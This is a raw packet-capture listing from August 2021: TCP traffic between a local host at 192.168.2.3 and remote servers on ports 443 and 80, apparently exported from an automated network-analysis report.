Aug 23, 2021 02:08:58.258193970 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.258202076 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.258205891 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.258224964 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.258238077 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.258246899 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.258295059 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.258810043 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.258833885 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.258862019 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.258867025 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.258884907 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.258886099 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.258908033 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.258918047 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.258932114 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.258960962 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.259577036 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.259604931 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.259627104 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.259628057 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.259641886 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.259649038 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.259668112 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.259675026 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.259694099 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.259721994 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.260390997 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.260413885 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.260436058 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.260437012 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.260457993 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.260458946 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.260471106 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.260484934 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.260503054 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.260507107 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.260546923 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.260596991 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.261713028 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.261780024 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.261842012 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.261879921 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.261904001 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.261907101 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.261925936 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.261950970 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.261985064 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.262017012 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.262023926 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.262741089 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.262836933 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.262836933 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.262861013 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.262883902 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.262887955 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.262902021 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.262922049 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.263214111 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.263303995 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.263329983 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.263355017 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.263371944 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.263379097 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.263408899 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.263422012 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.263422012 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.263443947 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.263470888 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.263500929 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.264358044 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.264393091 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.264415979 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.264456987 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.264468908 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.264486074 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.264491081 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.264503956 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.264504910 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.264530897 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.264564991 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.264576912 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.265192986 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.265218019 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.265256882 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.265281916 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.265305042 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.265321016 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.265429974 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.265505075 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.265513897 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.265520096 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.265523911 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.266058922 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.266087055 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.266109943 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.266129971 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.266146898 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.266153097 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.266158104 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.266175985 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.266204119 CEST	80	49756	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:58.266261101 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.266290903 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.266299009 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.266897917 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.266925097 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.266947031 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.266983032 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.266983986 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.267005920 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.267009020 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.267034054 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.267055988 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.267064095 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.267081022 CEST	80	49756	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:58.267098904 CEST	80	49756	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:58.267101049 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.267112017 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.267184019 CEST	49756	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.268054962 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268081903 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268105030 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268146992 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.268207073 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.268240929 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268354893 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.268409967 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268434048 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268465996 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268498898 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.268522978 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.268578053 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.268764973 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268791914 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268814087 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268826962 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.268840075 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268843889 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.268871069 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268896103 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268918991 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.268930912 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.268954992 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.268989086 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.269726038 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.269752979 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.269776106 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.269823074 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.269843102 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.269848108 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.270009995 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.270034075 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.270056009 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.270067930 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.270077944 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.270102024 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.270103931 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.270128965 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.270138979 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.270153999 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.270174980 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.270206928 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.270917892 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.270942926 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.270966053 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.270981073 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.270993948 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271018028 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271018982 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.271040916 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271051884 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.271065950 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271085978 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.271121979 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.271799088 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271826982 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271850109 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271856070 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.271878958 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271892071 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.271905899 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271924019 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.271929979 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271950960 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.271955013 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.271975994 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.271991968 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.272671938 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.272699118 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.272722006 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.272746086 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.272746086 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.272763014 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.272769928 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.272778988 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.272821903 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.272839069 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.272891998 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.272898912 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.272949934 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.273113966 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.273176908 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.273211956 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.273257017 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.273317099 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.273339033 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.273921967 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.273948908 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.273974895 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.273998022 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274005890 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274019957 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274022102 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274046898 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274056911 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274061918 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274066925 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274071932 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274094105 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274097919 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274121046 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274122953 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274151087 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274163008 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274177074 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274180889 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274200916 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274207115 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274272919 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274333000 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274657011 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274733067 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274756908 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274776936 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274780035 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274823904 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274841070 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274861097 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274868965 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274868965 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274895906 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274916887 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274919987 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274943113 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274951935 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274957895 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274962902 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.274967909 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.274991989 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275024891 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275031090 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275036097 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275707006 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275732994 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275758028 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275778055 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275782108 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275793076 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275798082 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275804996 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275827885 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275832891 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275851011 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275851011 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275867939 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275873899 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275896072 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275898933 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275923014 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275939941 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.275949955 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.275965929 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.276001930 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.276590109 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276614904 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276638985 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276638031 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.276655912 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.276662111 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276673079 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.276686907 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276709080 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276722908 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.276748896 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276772022 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276801109 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276823044 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276839018 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.276846886 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.276846886 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.276859999 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.276921034 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.277458906 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.277488947 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.277513981 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.277537107 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.277889967 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.277909040 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.277941942 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.277952909 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.277968884 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.277992010 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.277992964 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.278004885 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.278016090 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.278038025 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.278043985 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.278065920 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.278068066 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.278073072 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.278091908 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.278121948 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.278150082 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.278156042 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.278165102 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.278177023 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.278192997 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.278251886 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.279201984 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.279228926 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.279251099 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.279273033 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.279299021 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.279313087 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.279324055 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.279345989 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.279350996 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.279355049 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.279371023 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.279412985 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.279417038 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.279418945 CEST	49753	443	192.168.2.3	162.159.134.233
